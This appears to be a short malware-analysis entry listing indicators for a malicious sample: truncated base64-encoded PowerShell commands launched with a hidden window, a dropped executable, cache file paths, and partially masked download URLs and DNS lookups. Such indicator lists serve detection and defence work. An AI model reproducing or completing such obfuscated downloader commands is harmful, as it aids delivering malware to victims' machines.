Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEEASgBWAEcAZAB0AHEAPQAnAFcAUQBLAFkAUQBiAG0AbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAHUAcgBpAHQAYABZAFAAcgBvAFQAbwBgAEMATwBMACIAIAA9AC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\312.exe
- http://jd#####ronics.com.au/1e8nq_ij3_tq76ahy/
- http://it###nsult.com/d3z_knd_g4/
- http://it##.org/wwvvv/e0aa_nir08_vf/
- DNS ASK jd#####ronics.com.au
- DNS ASK fo####jetivo.com
- DNS ASK it##ssi.com
- DNS ASK it###nsult.com
- DNS ASK it##.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAEEASgBWAEcAZAB0AHEAPQAnAFcAUQBLAFkAUQBiAG0AbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAHUAcgBpAHQAYABZAFAAcgBvAFQAbwBgAEMATwBMACIAIAA9AC...' (with hidden window)